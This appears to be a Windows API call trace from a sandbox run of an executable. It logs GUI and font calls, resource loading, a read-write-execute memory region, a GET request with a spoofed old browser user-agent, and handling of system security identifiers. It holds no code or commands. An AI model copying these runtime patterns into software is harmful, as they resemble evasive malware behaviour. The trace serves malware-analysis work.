[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2b2dcc0*="FILE_DELETE") returned 1
[0110.365] SysReAllocStringLen (in: pbstr=0x2b2dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2b2dcb0*="FILE_DELETE_CHILD") returned 1
[0110.367] SetClassLongA (hWnd=0x401d6, nIndex=-14, dwNewLong=65575) returned 0x0
[0110.367] GetSystemMenu (hWnd=0x401d6, bRevert=0) returned 0x301eb
[0110.367] DeleteMenu (hMenu=0x301eb, uPosition=0xf030, uFlags=0x0) returned 1
[0110.367] DeleteMenu (hMenu=0x301eb, uPosition=0xf000, uFlags=0x0) returned 1
[0110.367] DeleteMenu (hMenu=0x301eb, uPosition=0xf010, uFlags=0x0) returned 1
[0110.367] GetCurrentThreadId () returned 0xfa8
[0110.367] ResetEvent (hEvent=0xa0) returned 1
[0110.368] GetCurrentThreadId () returned 0xfa8
[0110.368] GetCurrentThreadId () returned 0xfa8
[0110.368] GetCurrentThreadId () returned 0xfa8
[0110.368] ResetEvent (hEvent=0xa0) returned 1
[0110.368] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xcf234, fWinIni=0x0 | out: pvParam=0xcf234) returned 1
[0110.368] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xcf234, fWinIni=0x0 | out: pvParam=0xcf234) returned 1
[0110.368] GetSystemMetrics (nIndex=49) returned 16
[0110.368] GetSystemMetrics (nIndex=50) returned 16
[0110.368] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xcf27c, fWinIni=0x0 | out: pvParam=0xcf27c) returned 1
[0110.368] IsWindowVisible (hWnd=0x401d6) returned 0
[0110.368] GetCurrentThreadId () returned 0xfa8
[0110.369] VirtualQuery (in: lpAddress=0x2b01668, lpBuffer=0xcf14c, dwLength=0x1c | out: lpBuffer=0xcf14c*(BaseAddress=0x2b01000, AllocationBase=0x2a40000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0110.369] FindResourceA (hModule=0x2a40000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2b48990
[0110.369] FindResourceA (hModule=0x2a40000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2b48990
[0110.369] LoadResource (hModule=0x2a40000, hResInfo=0x2b48990) returned 0x2b4f044
[0110.369] SizeofResource (hModule=0x2a40000, hResInfo=0x2b48990) returned 0xca5
[0110.369] LockResource (hResData=0x2b4f044) returned 0x2b4f044
[0110.369] GetCurrentThreadId () returned 0xfa8
[0110.369] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xcef00, fWinIni=0x0 | out: pvParam=0xcef00) returned 1
[0110.369] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xcef00, fWinIni=0x0 | out: pvParam=0xcef00) returned 1
[0110.369] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xcef00, fWinIni=0x0 | out: pvParam=0xcef00) returned 1
[0110.369] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xcef00, fWinIni=0x0 | out: pvParam=0xcef00) returned 1
[0110.370] GetDC (hWnd=0x0) returned 0xd010847
[0110.370] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceee4 | out: lptm=0xceee4) returned 1
[0110.370] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0110.372] CreateFontIndirectA (lplf=0xcee9c) returned 0x450a0846
[0110.372] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.372] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef1c | out: lptm=0xcef1c) returned 1
[0110.372] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.372] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.372] GetSystemMetrics (nIndex=6) returned 1
[0110.372] VirtualAlloc (lpAddress=0x2b64000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2b64000
[0110.372] GetDC (hWnd=0x0) returned 0xd010847
[0110.372] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceee4 | out: lptm=0xceee4) returned 1
[0110.372] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.372] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef1c | out: lptm=0xcef1c) returned 1
[0110.372] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.372] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.373] GetSystemMetrics (nIndex=6) returned 1
[0110.373] GetDC (hWnd=0x0) returned 0xd010847
[0110.373] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceee4 | out: lptm=0xceee4) returned 1
[0110.373] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.373] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef1c | out: lptm=0xcef1c) returned 1
[0110.373] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.373] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.373] GetSystemMetrics (nIndex=6) returned 1
[0110.373] GetDC (hWnd=0x0) returned 0xd010847
[0110.373] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceee4 | out: lptm=0xceee4) returned 1
[0110.373] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.373] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef1c | out: lptm=0xcef1c) returned 1
[0110.374] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.374] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.374] GetSystemMetrics (nIndex=6) returned 1
[0110.374] GetDC (hWnd=0x0) returned 0xd010847
[0110.374] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceef8 | out: lptm=0xceef8) returned 1
[0110.374] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.374] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef30 | out: lptm=0xcef30) returned 1
[0110.374] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.374] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.374] GetSystemMetrics (nIndex=6) returned 1
[0110.374] GetDC (hWnd=0x0) returned 0xd010847
[0110.374] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcebfc | out: lptm=0xcebfc) returned 1
[0110.374] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.374] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcec34 | out: lptm=0xcec34) returned 1
[0110.374] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.374] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.374] GetSystemMetrics (nIndex=6) returned 1
[0110.375] GetDC (hWnd=0x0) returned 0xd010847
[0110.375] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceef8 | out: lptm=0xceef8) returned 1
[0110.375] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.375] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef30 | out: lptm=0xcef30) returned 1
[0110.375] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.375] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.375] GetSystemMetrics (nIndex=6) returned 1
[0110.375] GetDC (hWnd=0x0) returned 0xd010847
[0110.375] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcebfc | out: lptm=0xcebfc) returned 1
[0110.375] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.375] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcec34 | out: lptm=0xcec34) returned 1
[0110.375] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.375] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.375] GetSystemMetrics (nIndex=6) returned 1
[0110.375] GetDC (hWnd=0x0) returned 0xd010847
[0110.375] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceef8 | out: lptm=0xceef8) returned 1
[0110.375] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.375] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef30 | out: lptm=0xcef30) returned 1
[0110.375] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.375] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.376] GetSystemMetrics (nIndex=6) returned 1
[0110.376] GetDC (hWnd=0x0) returned 0xd010847
[0110.376] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcebfc | out: lptm=0xcebfc) returned 1
[0110.376] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.376] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcec34 | out: lptm=0xcec34) returned 1
[0110.376] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.376] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.376] GetSystemMetrics (nIndex=6) returned 1
[0110.376] GetDC (hWnd=0x0) returned 0xd010847
[0110.376] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceee4 | out: lptm=0xceee4) returned 1
[0110.376] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.376] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef1c | out: lptm=0xcef1c) returned 1
[0110.376] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.376] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.376] GetSystemMetrics (nIndex=6) returned 1
[0110.376] GetDC (hWnd=0x0) returned 0xd010847
[0110.376] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceee4 | out: lptm=0xceee4) returned 1
[0110.377] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.377] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef1c | out: lptm=0xcef1c) returned 1
[0110.377] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.377] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.377] GetSystemMetrics (nIndex=6) returned 1
[0110.377] GetDC (hWnd=0x0) returned 0xd010847
[0110.377] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceef8 | out: lptm=0xceef8) returned 1
[0110.377] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.377] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef30 | out: lptm=0xcef30) returned 1
[0110.377] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.377] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.377] GetSystemMetrics (nIndex=6) returned 1
[0110.377] GetDC (hWnd=0x0) returned 0xd010847
[0110.377] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcebfc | out: lptm=0xcebfc) returned 1
[0110.377] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.377] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcec34 | out: lptm=0xcec34) returned 1
[0110.377] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.377] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.377] GetSystemMetrics (nIndex=6) returned 1
[0110.378] GetDC (hWnd=0x0) returned 0xd010847
[0110.378] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceef8 | out: lptm=0xceef8) returned 1
[0110.378] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.378] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef30 | out: lptm=0xcef30) returned 1
[0110.378] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.378] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.378] GetSystemMetrics (nIndex=6) returned 1
[0110.378] GetDC (hWnd=0x0) returned 0xd010847
[0110.378] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcebfc | out: lptm=0xcebfc) returned 1
[0110.378] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.378] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcec34 | out: lptm=0xcec34) returned 1
[0110.378] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.378] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.378] GetSystemMetrics (nIndex=6) returned 1
[0110.378] GetDC (hWnd=0x0) returned 0xd010847
[0110.378] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceef8 | out: lptm=0xceef8) returned 1
[0110.378] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.378] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef30 | out: lptm=0xcef30) returned 1
[0110.378] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.378] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.378] GetSystemMetrics (nIndex=6) returned 1
[0110.378] GetDC (hWnd=0x0) returned 0xd010847
[0110.379] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcebfc | out: lptm=0xcebfc) returned 1
[0110.379] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.379] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcec34 | out: lptm=0xcec34) returned 1
[0110.379] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.379] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.379] GetSystemMetrics (nIndex=6) returned 1
[0110.379] GetDC (hWnd=0x0) returned 0xd010847
[0110.379] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceef8 | out: lptm=0xceef8) returned 1
[0110.379] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.379] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef30 | out: lptm=0xcef30) returned 1
[0110.379] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.379] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.379] GetSystemMetrics (nIndex=6) returned 1
[0110.379] GetDC (hWnd=0x0) returned 0xd010847
[0110.379] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcebfc | out: lptm=0xcebfc) returned 1
[0110.379] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.379] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcec34 | out: lptm=0xcec34) returned 1
[0110.379] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.379] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.379] GetSystemMetrics (nIndex=6) returned 1
[0110.380] GetDC (hWnd=0x0) returned 0xd010847
[0110.380] GetTextMetricsA (in: hdc=0xd010847, lptm=0xceee4 | out: lptm=0xceee4) returned 1
[0110.380] SelectObject (hdc=0xd010847, h=0x450a0846) returned 0x18a002e
[0110.380] GetTextMetricsA (in: hdc=0xd010847, lptm=0xcef1c | out: lptm=0xcef1c) returned 1
[0110.380] SelectObject (hdc=0xd010847, h=0x18a002e) returned 0x450a0846
[0110.380] ReleaseDC (hWnd=0x0, hDC=0xd010847) returned 1
[0110.380] GetSystemMetrics (nIndex=6) returned 1
[0110.381] SysReAllocStringLen (in: pbstr=0x2b6f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2b6f388*="GET") returned 1
[0110.381] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.382] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.382] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.382] SysReAllocStringLen (in: pbstr=0x2b6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2b6f388*="GET") returned 1
[0110.382] SysReAllocStringLen (in: pbstr=0x2b6f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2b6f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0110.382] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0xcef80, lpdwBufferLength=0xcef84 | out: lpBuffer=0xcef80, lpdwBufferLength=0xcef84) returned 1
[0110.498] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0xcef80, dwBufferLength=0x4) returned 1
[0110.498] VirtualFree (lpAddress=0x2b70000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0110.498] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2b66490, cbMultiByte=3, lpWideCharStr=0xcdeb8, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0110.498] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.498] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.498] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.498] SysReAllocStringLen (in: pbstr=0x2b6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2b6f388*="GET") returned 1
[0110.499] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.499] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.499] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.499] SysReAllocStringLen (in: pbstr=0x2b6f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2b6f388*="GET") returned 1
[0110.500] FlatSB_SetScrollProp (param_1=0x700de, index=0x200, newValue=0x0, param_4=1) returned 0
[0110.500] GetSysColor (nIndex=20) returned 0xffffff
[0110.500] FlatSB_SetScrollProp (param_1=0x700de, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0110.500] FlatSB_SetScrollInfo (param_1=0x700de, code=0, psi=0xcddee, fRedraw=1)
[0110.501] CallWindowProcA (lpPrevWndFunc=0x2a47038, hWnd=0x700de, Msg=0x46, wParam=0x0, lParam=0xcdcec) returned 0x0
[0110.504] GetTextExtentPoint32A (in: hdc=0x1201087d, lpString="0", c=1, psizl=0xcf074 | out: psizl=0xcf074) returned 1
[0110.505] IsIconic (hWnd=0x700de) returned 0
[0110.505] GetClientRect (in: hWnd=0x700de, lpRect=0xcf074 | out: lpRect=0xcf074) returned 1
[0110.505] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.505] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.505] IsIconic (hWnd=0x700de) returned 0
[0110.505] GetClientRect (in: hWnd=0x700de, lpRect=0xcefbc | out: lpRect=0xcefbc) returned 1
[0110.505] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.505] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.505] IsIconic (hWnd=0x700de) returned 0
[0110.505] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.505] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.505] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.505] IsIconic (hWnd=0x700de) returned 0
[0110.505] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.505] FlatSB_SetScrollProp (param_1=0x700de, index=0x200, newValue=0x0, param_4=0) returned 0
[0110.505] GetSysColor (nIndex=20) returned 0xffffff
[0110.505] FlatSB_SetScrollProp (param_1=0x700de, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0110.505] FlatSB_SetScrollInfo (param_1=0x700de, code=0, psi=0xcefca, fRedraw=1) returned 0
[0110.506] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.506] IsIconic (hWnd=0x700de) returned 0
[0110.506] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.506] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.506] IsIconic (hWnd=0x700de) returned 0
[0110.506] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.506] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.506] IsIconic (hWnd=0x700de) returned 0
[0110.506] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.506] FlatSB_SetScrollProp (param_1=0x700de, index=0x100, newValue=0x0, param_4=0) returned 0
[0110.506] GetSysColor (nIndex=20) returned 0xffffff
[0110.506] FlatSB_SetScrollProp (param_1=0x700de, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0110.506] FlatSB_SetScrollInfo (param_1=0x700de, code=1, psi=0xcefca, fRedraw=1) returned 0
[0110.506] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.506] IsIconic (hWnd=0x700de) returned 0
[0110.506] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.506] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.506] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.506] IsIconic (hWnd=0x700de) returned 0
[0110.506] GetClientRect (in: hWnd=0x700de, lpRect=0xcefbc | out: lpRect=0xcefbc) returned 1
[0110.506] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.506] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.506] IsIconic (hWnd=0x700de) returned 0
[0110.506] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.506] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.507] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.507] IsIconic (hWnd=0x700de) returned 0
[0110.507] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.507] FlatSB_SetScrollProp (param_1=0x700de, index=0x200, newValue=0x0, param_4=0) returned 0
[0110.507] GetSysColor (nIndex=20) returned 0xffffff
[0110.507] FlatSB_SetScrollProp (param_1=0x700de, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0110.507] FlatSB_SetScrollInfo (param_1=0x700de, code=0, psi=0xcefca, fRedraw=1) returned 0
[0110.507] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.507] IsIconic (hWnd=0x700de) returned 0
[0110.507] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.507] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.507] IsIconic (hWnd=0x700de) returned 0
[0110.507] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.507] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.507] IsIconic (hWnd=0x700de) returned 0
[0110.507] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.507] FlatSB_SetScrollProp (param_1=0x700de, index=0x100, newValue=0x0, param_4=0) returned 0
[0110.507] GetSysColor (nIndex=20) returned 0xffffff
[0110.507] FlatSB_SetScrollProp (param_1=0x700de, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0110.507] FlatSB_SetScrollInfo (param_1=0x700de, code=1, psi=0xcefca, fRedraw=1) returned 0
[0110.508] GetWindowLongA (hWnd=0x700de, nIndex=-16) returned 116326400
[0110.508] IsIconic (hWnd=0x700de) returned 0
[0110.508] GetClientRect (in: hWnd=0x700de, lpRect=0xcef8c | out: lpRect=0xcef8c) returned 1
[0110.508] GetCurrentThreadId () returned 0xfa8
[0110.508] ConvertSidToStringSidA () returned 0x1
[0110.508] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.508] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0110.508] LocalFree (hMem=0x226f40) returned 0x0
[0110.508] LocalFree (hMem=0x212f90) returned 0x0
[0110.508] ConvertStringSidToSidA () returned 0x1
[0110.508] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b62914, pSourceSid=0x212f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b62914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.508] IsValidSid (pSid=0x2b62914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.508] ConvertSidToStringSidA () returned 0x1
[0110.508] LocalFree (hMem=0x226f40) returned 0x0
[0110.508] LocalFree (hMem=0x212f90) returned 0x0
[0110.508] ConvertStringSidToSidA () returned 0x1
[0110.508] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6702c, pSourceSid=0x212f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b6702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.509] IsValidSid (pSid=0x2b6702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.509] ConvertSidToStringSidA () returned 0x1
[0110.509] LocalFree (hMem=0x226f40) returned 0x0
[0110.509] LocalFree (hMem=0x212f90) returned 0x0
[0110.509] ConvertStringSidToSidA () returned 0x1
[0110.509] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6f5a0, pSourceSid=0x212f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b6f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.509] IsValidSid (pSid=0x2b6f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.509] ConvertSidToStringSidA () returned 0x1
[0110.509] LocalFree (hMem=0x226f40) returned 0x0
[0110.509] LocalFree (hMem=0x212f90) returned 0x0
[0110.509] ConvertStringSidToSidA () returned 0x1
[0110.509] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6f614, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.509] IsValidSid (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.509] ConvertSidToStringSidA () returned 0x1
[0110.509] LocalFree (hMem=0x226f58) returned 0x0
[0110.509] LocalFree (hMem=0x226f40) returned 0x0
[0110.509] ConvertStringSidToSidA () returned 0x1
[0110.509] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6f688, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2b6f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
